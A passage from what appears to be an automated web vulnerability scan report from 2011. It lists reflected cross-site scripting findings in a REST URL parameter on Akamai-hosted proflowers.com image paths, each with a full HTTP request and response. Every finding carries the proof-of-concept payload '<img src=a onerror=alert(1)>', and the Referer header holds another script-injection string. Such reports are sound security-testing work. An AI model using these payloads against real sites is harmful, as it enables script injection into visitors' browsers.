GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092bc4c9f<img%20src%3da%20onerror%3dalert(1)>f3daf93728a?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:30 GMT
Connection: close

Unable to find /ProvideCommerce/P0055092bc4c9f<img src=a onerror=alert(1)>f3daf93728a

4.88. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 80d86<img%20src%3da%20onerror%3dalert(1)>c8d53e072ca was submitted in the REST URL parameter 9. This input was echoed as 80d86<img src=a onerror=alert(1)>c8d53e072ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b80d86<img%20src%3da%20onerror%3dalert(1)>c8d53e072ca?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:23 GMT
Connection: close

Unable to find /ProvideCommerce/P0063828b80d86<img src=a onerror=alert(1)>c8d53e072ca

4.89. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 66f8d<img%20src%3da%20onerror%3dalert(1)>51a292d4f1c was submitted in the REST URL parameter 9. This input was echoed as 66f8d<img src=a onerror=alert(1)>51a292d4f1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b66f8d<img%20src%3da%20onerror%3dalert(1)>51a292d4f1c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:18 GMT
Connection: close

Unable to find /ProvideCommerce/P0065857b66f8d<img src=a onerror=alert(1)>51a292d4f1c

4.90. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 89fba<img%20src%3da%20onerror%3dalert(1)>35e1a132750 was submitted in the REST URL parameter 9. This input was echoed as 89fba<img src=a onerror=alert(1)>35e1a132750 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P007188189fba<img%20src%3da%20onerror%3dalert(1)>35e1a132750?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:35 GMT
Connection: close

Unable to find /ProvideCommerce/P007188189fba<img src=a onerror=alert(1)>35e1a132750

4.91. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 26830<img%20src%3da%20onerror%3dalert(1)>e7f4acdcdc5 was submitted in the REST URL parameter 9. This input was echoed as 26830<img src=a onerror=alert(1)>e7f4acdcdc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b26830<img%20src%3da%20onerror%3dalert(1)>e7f4acdcdc5?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:26 GMT
Connection: close

Unable to find /ProvideCommerce/P0073650b26830<img src=a onerror=alert(1)>e7f4acdcdc5

4.92. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e4e87<img%20src%3da%20onerror%3dalert(1)>4b0efed6b53 was submitted in the REST URL parameter 9. This input was echoed as e4e87<img src=a onerror=alert(1)>4b0efed6b53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988be4e87<img%20src%3da%20onerror%3dalert(1)>4b0efed6b53?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:26 GMT
Connection: close

Unable to find /ProvideCommerce/P0085988be4e87<img src=a onerror=alert(1)>4b0efed6b53

4.93. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2370a<img%20src%3da%20onerror%3dalert(1)>c6102b76f4b was submitted in the REST URL parameter 9. This input was echoed as 2370a<img src=a onerror=alert(1)>c6102b76f4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b2370a<img%20src%3da%20onerror%3dalert(1)>c6102b76f4b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:31 GMT
Connection: close

Unable to find /ProvideCommerce/P0087026b2370a<img src=a onerror=alert(1)>c6102b76f4b

4.94. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 952f4<img%20src%3da%20onerror%3dalert(1)>435cb415871 was submitted in the REST URL parameter 9. This input was echoed as 952f4<img src=a onerror=alert(1)>435cb415871 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b952f4<img%20src%3da%20onerror%3dalert(1)>435cb415871?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:20 GMT
Connection: close

Unable to find /ProvideCommerce/P0102761b952f4<img src=a onerror=alert(1)>435cb415871

4.95. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 966a9<img%20src%3da%20onerror%3dalert(1)>283e49d607 was submitted in the REST URL parameter 9. This input was echoed as 966a9<img src=a onerror=alert(1)>283e49d607 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ966a9<img%20src%3da%20onerror%3dalert(1)>283e49d607?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 105
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:35 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000007G437_68702_W1_SQ966a9<img src=a onerror=alert(1)>283e49d607

4.96. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a9104<img%20src%3da%20onerror%3dalert(1)>f43391f294b was submitted in the REST URL parameter 9. This input was echoed as a9104<img src=a onerror=alert(1)>f43391f294b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQa9104<img%20src%3da%20onerror%3dalert(1)>f43391f294b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:36 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000008345X_49771_W1_SQa9104<img src=a onerror=alert(1)>f43391f294b

4.97. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9ac75<img%20src%3da%20onerror%3dalert(1)>86b196c9e7c was submitted in the REST URL parameter 9. This input was echoed as 9ac75<img src=a onerror=alert(1)>86b196c9e7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ9ac75<img%20src%3da%20onerror%3dalert(1)>86b196c9e7c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:21 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000009D282_88198_W1_SQ9ac75<img src=a onerror=alert(1)>86b196c9e7c

4.98. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5af77<img%20src%3da%20onerror%3dalert(1)>4d163bea439 was submitted in the REST URL parameter 9. This input was echoed as 5af77<img src=a onerror=alert(1)>4d163bea439 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ5af77<img%20src%3da%20onerror%3dalert(1)>4d163bea439?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:40 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000009G877_92524_W1_SQ5af77<img src=a onerror=alert(1)>4d163bea439

4.99. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dd160<img%20src%3da%20onerror%3dalert(1)>8c6c0a1560c was submitted in the REST URL parameter 9. This input was echoed as dd160<img src=a onerror=alert(1)>8c6c0a1560c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1dd160<img%20src%3da%20onerror%3dalert(1)>8c6c0a1560c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:34 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000010D01X_103184_W1dd160<img src=a onerror=alert(1)>8c6c0a1560c

4.100. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W1 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 81f6d<img%20src%3da%20onerror%3dalert(1)>5a8dda194a8 was submitted in the REST URL parameter 9. This input was echoed as 81f6d<img src=a onerror=alert(1)>5a8dda194a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W181f6d<img%20src%3da%20onerror%3dalert(1)>5a8dda194a8?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:20 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000010D946_103270_W181f6d<img src=a onerror=alert(1)>5a8dda194a8

4.101. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload da2a9<img%20src%3da%20onerror%3dalert(1)>f9d94d0215d was submitted in the REST URL parameter 9. This input was echoed as da2a9<img src=a onerror=alert(1)>f9d94d0215d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQda2a9<img%20src%3da%20onerror%3dalert(1)>f9d94d0215d?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:39 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000007G150X_68104_W1_SQda2a9<img src=a onerror=alert(1)>f9d94d0215d

4.102. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fdac5<img%20src%3da%20onerror%3dalert(1)>8cb69ded30 was submitted in the REST URL parameter 9. This input was echoed as fdac5<img src=a onerror=alert(1)>8cb69ded30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQfdac5<img%20src%3da%20onerror%3dalert(1)>8cb69ded30?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 105
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:21 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000007H4854_70842_W1_SQfdac5<img src=a onerror=alert(1)>8cb69ded30

4.103. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ

Issue detail

